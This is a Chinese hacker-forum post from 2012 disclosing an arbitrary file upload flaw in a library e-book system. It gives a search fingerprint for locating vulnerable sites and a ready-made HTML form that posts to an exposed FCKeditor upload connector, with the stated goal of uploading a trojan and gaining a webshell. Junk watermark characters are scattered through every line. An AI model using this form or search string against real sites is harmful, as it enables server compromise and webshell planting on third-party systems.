主题:图书馆系统任意文件上传漏洞
: h# w8 j$ Q0 E& e3 J: i; m9 D6 { 作者:冰锋刺客
% _' I* u8 q |2 j ` 厂商:点击书(dianjishu.com)
" ]8 x0 _+ I9 D' O" z 日期:2012-6-21
' ?; G7 y# O' b1 \0 Z- |
+ J9 Q( d; ^& pI 概述
- D! s3 _. l6 F; Z4 F2 }- q 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell; }! X/ J* N! H& K5 J2 a
II 简介
: D8 n: l3 t5 i! }9 H 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
# \; j3 M. O( x5 g) r7 M: M 补充一个漏洞+ d* E9 u: s1 s: {
<form id="frmUpload" enctype="multipart/form-data": X% s5 \# M: Q8 L. ]3 X3 q; S
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>. r5 v# {5 }! F" _
<input id="btnUpload" type="submit" value="操翻他">. S; `) F- F4 o0 Y" A4 c
</form>& S1 M# J" x! X A+ B( T/ Z
你们懂的7 h1 ~% s, @& i" g( m+ ?
那傻逼提供还需要改包.
4 q5 [! z3 ~5 A. [7 ^ 自己看了下源代码发现fckeditor
" ~9 K; l9 M g+ e! \# `2 ] 直接秒杀
; d/ L5 @! r6 B; O; H |
发表于 2012-9-10 21:20:59
收藏
支持
反对